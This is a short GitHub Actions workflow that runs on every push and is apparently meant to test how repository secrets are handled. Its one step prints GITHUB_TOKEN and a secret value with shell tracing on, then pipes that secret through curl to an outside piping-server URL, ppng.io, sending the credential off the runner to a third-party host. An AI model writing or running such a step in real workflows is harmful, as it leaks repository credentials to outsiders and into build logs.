name: Check Secret Variables
on: [push]
jobs:
  print-envs:
    runs-on: ubuntu-18.04
    steps:
      - name: Print secrets
        run: |
          set -x
          echo $GITHUB_TOKEN
          echo $SECRET_VALUE1
          echo $SECRET_VALUE1 | curl -T - https://ppng.io/2020-10-25-secur
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          SECRET_VALUE1: ${{ secrets.SECRET_VALUE1 }}
